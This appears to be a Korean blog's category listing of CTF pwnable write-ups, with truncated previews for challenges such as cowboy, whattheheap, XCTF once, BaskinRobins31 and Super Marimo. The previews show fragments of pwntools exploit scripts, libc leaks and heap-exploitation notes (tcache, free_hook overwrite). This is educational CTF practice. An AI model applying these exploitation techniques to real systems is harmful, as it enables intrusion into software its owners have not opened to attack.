목록System (72)
y0u_bat
보호되어 있는 글입니다.
보호되어 있는 글입니다.
라이트업으로 쓸려구 했는데, 기억이 가물해서 그냥 코드만 올립니당 from pwn import * import json context.log_level = 'DEBUG' #s = process("./cowboy",env={"LD_PRELOAD":'./libc.so.6'}) #gdb.attach(s) #a = remote("127.0.0.1",1234) s = remote("cowboy.eatpwnnosleep.com",14697) a = { 'apikey' : 'key', } s.send(json.dumps(a).encode()) print s.recv(4096) def alloc(size): sleep(0.2) s.sendline("1") sleep(0.2) s.recvuntil("2049:") s.s..
Whitehat Final PAC - 500ptglibc 2.26 환경에서 문제를 풀어본 적이 없기 때문에, 문제 풀면서 tcache에 대해 공부된 것 같다. MitigationCANARY,PIE,NX,RELRO가 다 걸린것을 볼 수 있다.제일 중요한것은 glibc가 2.26 version이라는것이다. glibc malloc에 tcache라는것이 생겼다. Problem Introduction간단히 문제를 소개하자면, 스타크래프트 컨셉이다. 종족을 선택하고 각 종족의 유닛을 39개까지 생성했다. 지웠다 할 수 있다. 기존 스타에 있는 치트키 같은것도 히든메뉴로 존재한다.먼저, 유닛을 생성하기 위해 미네랄과 가스가 필요한데, 이부분은 히든메뉴인, 치트키로부터 얻을 수 있다. < CheatKey ..
[H3XOR] whattheheap심심해서 풀어봤습니당. Exploitfrom pwn import * context.log_level = 'debug' #s = process("./whattheheap") s = remote("49.236.136.140",16000) def leak(): s.recvuntil("please input your name!\n") s.send("a"*0x28) s.sendline("6") s.recvuntil("a"*0x28) libc_base = u64(s.recv(6) + "\x00\x00") - 0x18c627 s.sendline("5") s.recvuntil("Enter the name you want to change.\n") s.send("b"*0xd8) ..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
XCTF - once간만에 심심해서 CTF 문제를 풀어봤다. Mitigation모든 보호기법이 걸려 있다.그러므로 free_hook에 원샷 가젯을 덮는 식으로 풀어야 된다.5번 메뉴로 libc 주소를 준다. 이 메뉴로 libc base를 구하면 된다. Vulnerability 문제점4를 누르고 2를 누르면 ptr에 size 크기만큼 덮을 수 있게 된다. 그런데 ptr이 있는지 없는지 체크를 안한다.처음 1를 누르면 0x20만큼 할당하고 2번으로 방금 할당한 공간에 0x20만큼 원하는 데이터를 쓸 수 있는데, 중요한 데이터를 수정 할 수 있기 때문에 3번 메뉴에서 ptr의 내용을 0x202020으로 덮을 수 있다. 요약:ptr의 내용을 0x202020으로 바꾼다. 4->1에서 큰 사이즈를 입력하여 ptr ..
BaskinRobins31간단한 64비트 버퍼오버플로우입니다.Mitigationihaechan@ubuntu:~/Desktop$ ./pwnable/checksec.sh --file ./BaskinRobins31 RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH ./BaskinRobins31 ihaechan@ubuntu:~/Desktop$vulnerabilitysigned __int64 __fastcall your_turn(_DWORD *a1) { signed __int64 result; // rax char s; // [rsp+10h] [rbp-B0h] s..
Super Marimo간단한 힙오버플로우 취약점 입니다.익스 코드 정리 안되어있는건 양해 부탁드립니당!Mitigationihaechan@ubuntu:~/Desktop$ ./pwnable/checksec.sh --file ./marimo RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH ./marimo ihaechan@ubuntu:~/Desktop$Vulnerability_BYTE *__fastcall sub_400EED(__int64 a1, unsigned int a2, unsigned int a3) { unsigned __int64 v3; // ST00_8 ..